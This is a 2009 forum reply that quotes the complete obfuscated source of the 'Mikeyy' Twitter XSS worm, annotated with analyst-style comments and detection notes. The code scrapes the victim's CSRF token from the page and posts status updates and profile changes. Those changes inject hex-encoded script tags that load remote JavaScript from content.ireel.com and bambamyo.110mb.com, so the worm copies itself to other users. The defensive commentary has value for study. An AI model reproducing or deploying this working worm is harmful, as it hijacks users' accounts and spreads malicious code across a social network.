
RE: Another Ajax powered XSS worm



RE: Another Ajax powered XSS worm
by Worthersee at 3:01 pm EDT, Apr 13, 2009

Cute obfuscation

// String table for the obfuscated worm body below. Every property access and
// literal in XHConn/urlencode/wait is routed through _0xc26a[index], so none
// of the plain text appears inline. Groups by (hex) index:
//   0x00-0x10  XMLHttpRequest/ActiveX program ids and request plumbing
//   0x11-0x22  split/join and the %XX substitutions used by urlencode
//   0x23-0x25  innerHTML / documentElement / exec, used to scrape the page
//   0x26-0x29  the four status texts the worm posts
//   0x2d-0x2f  the three self-copying payloads: each closes an <a> tag, then
//              document.write()s an unescape()d hex string that decodes to a
//              <script src="http://HOST/NAME.js"></script> tag (the hex
//              decodes to hosts content.ireel.com and bambamyo.110mb.com)
//   0x30-0x3a  Twitter endpoints and form-field fragments used by wait()
//   0x3b       "wait()" — the string the setTimeout at the bottom evaluates
// Detection value: the payload strings and the "Mikeyy" status texts are
// literal indicators; the injected fields are user[url] and
// user[profile_link_color].
// NOTE(review): the trailing `"wait()""]` has a stray double quote — looks
// like a transcription artifact of the posted listing rather than original.
var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "POST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "POST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];
 
// XHConn: minimal XMLHttpRequest wrapper. Tries the two ActiveX program ids
// first (_0xc26a[0x0], _0xc26a[0x1]) and the native XMLHttpRequest last.
// Exposes one method, connect(url, method, params, callback), and returns
// null when no transport can be constructed.
function XHConn(){
  // _0x6687x2: the request object; _0x6687x3: "callback already fired" latch
  var _0x6687x2,_0x6687x3=false;
  try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }
  catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }
  catch(e) { try { _0x6687x2= new XMLHttpRequest(); }
  catch(e) { _0x6687x2=false; }; }; };
  
  if (!_0x6687x2) { return null; } ;
  
  // connect(url, method, params, callback): asynchronous request; returns
  // true once send() has been issued, false if open()/send() threw (the
  // error is swallowed). GET appends params as the query string; any other
  // method sends params as an application/x-www-form-urlencoded body.
  this[_0xc26a[0x2]]=function (_0x6687x4,_0x6687x5,_0x6687x6,_0x6687x7) {
    if (!_0x6687x2) { return false; };
    _0x6687x3=false;
    _0x6687x5=_0x6687x5[_0xc26a[0x3]]();   // method name upper-cased
    try {
      if(_0x6687x5==_0xc26a[0x4]) {
        _0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4+_0xc26a[0x5]+_0x6687x6,true);
        _0x6687x6=_0xc26a[0x7];
      } else {
        _0x6687x2[_0xc26a[0x6]](_0x6687x5,_0x6687x4,true);
        // Sets a non-standard request header literally named "Method" with
        // the value "POST <url> HTTP/1.1" — serves no protocol purpose, but
        // it is a usable signature for this sample on the wire.
        _0x6687x2[_0xc26a[0xb]](_0xc26a[0x8],_0xc26a[0x9]+_0x6687x4+_0xc26a[0xa]);
        _0x6687x2[_0xc26a[0xb]](_0xc26a[0xc],_0xc26a[0xd]);
      } ;
      // Fire the callback once, at readyState 4. wait() passes no callback,
      // so _0x6687x7 is undefined there and this handler throws when it runs;
      // the request has already been dispatched by send() below, so that
      // error does not stop the POST.
      _0x6687x2[_0xc26a[0xe]]=function () {
        if (_0x6687x2[_0xc26a[0xf]]==0x4&&!_0x6687x3) {
          _0x6687x3=true;
          _0x6687x7(_0x6687x2);
        } ;
      } ;
      _0x6687x2[_0xc26a[0x10]](_0x6687x6);
    } catch(z) {
      return false;
    } ;
    return true;
  } ;
  return this;
} ;
 
// urlencode(value): encodeURIComponent(String(value)), then post-processed
// toward PHP-style form encoding: ' ( ) * ~ ! are percent-encoded, %20 is
// turned into '+', and any lower-case %xx pair is upper-cased. wait() uses
// it to encode the status text and the injected payload before they go
// into the POST bodies.
function urlencode(_0x6687x9) {
  // _0x6687xa: search -> replacement map; the outer _0x6687xb is never used
  var _0x6687xa={},_0x6687xb=[];
  var _0x6687xc=_0x6687x9.toString();
  // replace-all implemented as split(search).join(replacement), which avoids
  // having to regex-escape the search string
  var _0x6687xd=function (_0x6687xe,_0x6687xf,_0x6687x9) {
    var _0x6687xb=[];
    _0x6687xb=_0x6687x9[_0xc26a[0x11]](_0x6687xe);
    return _0x6687xb[_0xc26a[0x12]](_0x6687xf);
  } ;
  _0x6687xa[_0xc26a[0x13]]=_0xc26a[0x14];   // '  -> %27
  _0x6687xa[_0xc26a[0x15]]=_0xc26a[0x16];   // (  -> %28
  _0x6687xa[_0xc26a[0x17]]=_0xc26a[0x18];   // )  -> %29
  _0x6687xa[_0xc26a[0x19]]=_0xc26a[0x1a];   // *  -> %2A
  _0x6687xa[_0xc26a[0x1b]]=_0xc26a[0x1c];   // ~  -> %7E
  _0x6687xa[_0xc26a[0x1d]]=_0xc26a[0x1e];   // !  -> %21
  _0x6687xa[_0xc26a[0x1f]]=_0xc26a[0x20];   // %20 -> +
  _0x6687xc=encodeURIComponent(_0x6687xc);
  // `search` and `replace` are never declared, so they leak as globals
  // (`replace` here shadows nothing, but collides by name with the String
  // method used below).
  for (search in _0x6687xa) {
    replace=_0x6687xa[search];
    _0x6687xc=_0x6687xd(search,replace,_0x6687xc);
  } ;
  // Upper-case the hex of any %xx escape. encodeURIComponent presumably
  // already emits upper-case hex, so this mostly matters for pre-encoded
  // input — confirm against the engine if it matters.
  return _0x6687xc[_0xc26a[0x22]](/(\%([a-z0-9]{2}))/g,function (_0x6687x10,_0x6687x11,_0x6687x12) {
    return _0xc26a[0x21]+_0x6687x12[_0xc26a[0x3]]();
  } );
  // unreachable: the function has already returned above
  return _0x6687xc;
} ;
 
// wait(): the worm body, run once by the setTimeout at the bottom of the file.
// 1. Scrapes the page's own HTML for Twitter's CSRF token, which the 2009
//    markup exposed as a JS literal (twttr.form_authenticity_token = '...').
// 2. Picks one of four status texts and one of three self-copying payloads.
// 3. Fires seven asynchronous same-origin POSTs carrying that token: one
//    status update, then three copy-pasted repeats of the pair
//    (/account/settings with the payload in user[url],
//     /account/profile_settings with the payload in user[profile_link_color]).
// Propagation depends on those profile fields being rendered unescaped into
// other users' pages. A CSRF token does not stop this — the script runs in
// the victim's own session and simply reads the token — so the control is
// output encoding of the profile fields (and, today, a CSP that forbids
// inline script and unknown script origins).
function wait() {
  var _0x6687x14=document[_0xc26a[0x24]][_0xc26a[0x23]];   // document.documentElement.innerHTML
  // `authreg` is an undeclared global. The greedy (.*) captures up to the
  // last "';" on the same line of markup.
  authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var _0x6687x15=authreg[_0xc26a[0x25]](_0x6687x14);
  // No null check: on a page without the token this throws here, before
  // any request is made.
  _0x6687x15=_0x6687x15[0x1];
  
  // status texts (_0xc26a[0x26..0x29]); one is chosen at random
  var _0x6687x16= new Array();
  _0x6687x16[0x0]=_0xc26a[0x26];
  _0x6687x16[0x1]=_0xc26a[0x27];
  _0x6687x16[0x2]=_0xc26a[0x28];
  _0x6687x16[0x3]=_0xc26a[0x29];
  var _0x6687x17=_0x6687x16[Math[_0xc26a[0x2c]](Math[_0xc26a[0x2a]]()*_0x6687x16[_0xc26a[0x2b]])];
  var _0x6687x18=urlencode(_0x6687x17);
  
  // self-copying payloads (_0xc26a[0x2d..0x2f]); one is chosen at random
  var _0x6687x19= new Array();
  _0x6687x19[0x0]=_0xc26a[0x2d];
  _0x6687x19[0x1]=_0xc26a[0x2e];
  _0x6687x19[0x2]=_0xc26a[0x2f];
  var _0x6687x1a=_0x6687x19[Math[_0xc26a[0x2c]](Math[_0xc26a[0x2a]]()*_0x6687x19[_0xc26a[0x2b]])];
  var _0x6687x1b=urlencode(_0x6687x1a);
  
  // POST /status/update  body: authenticity_token=<tok>&status=<text>&...
  // Every connect() call below passes three arguments, so XHConn's
  // readyState handler has no callback to invoke (see XHConn).
  var _0x6687x1c= new XHConn();
  _0x6687x1c[_0xc26a[0x2]](_0xc26a[0x30],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x33]+_0x6687x18+_0xc26a[0x34]);
  
  // POST /account/settings  body: ...&user[name]=Womp...!&user[url]=<payload>&...
  var _0x6687x1d= new XHConn();
  _0x6687x1d[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
  
  // POST /account/profile_settings  body: ...&user[profile_link_color]=<payload>&commit=save+changes
  var _0x6687x1e= new XHConn();
  _0x6687x1e[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
  
  // The two requests above are repeated verbatim twice more (six requests
  // in total against the two settings endpoints), with no loop and no
  // sequencing between them.
  var _0x6687x1f= new XHConn();
  _0x6687x1f[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
  
  var _0x6687x20= new XHConn();
  _0x6687x20[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
  
  var _0x6687x21= new XHConn();
  _0x6687x21[_0xc26a[0x2]](_0xc26a[0x35],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x36]+_0x6687x1b+_0xc26a[0x37]);
  
  var _0x6687x22= new XHConn();
  _0x6687x22[_0xc26a[0x2]](_0xc26a[0x38],_0xc26a[0x31],_0xc26a[0x32]+_0x6687x15+_0xc26a[0x39]+_0x6687x1b+_0xc26a[0x3a]);
} ;
// Entry point. _0xc26a[0x3b] is the string "wait()", so this is the
// string-argument (eval) form of setTimeout, firing after 0xdac = 3500 ms —
// presumably to let the page finish loading so the token is present in the
// scraped HTML. A CSP without 'unsafe-eval' blocks this form of scheduling.
setTimeout(_0xc26a[0x3b],0xdac);
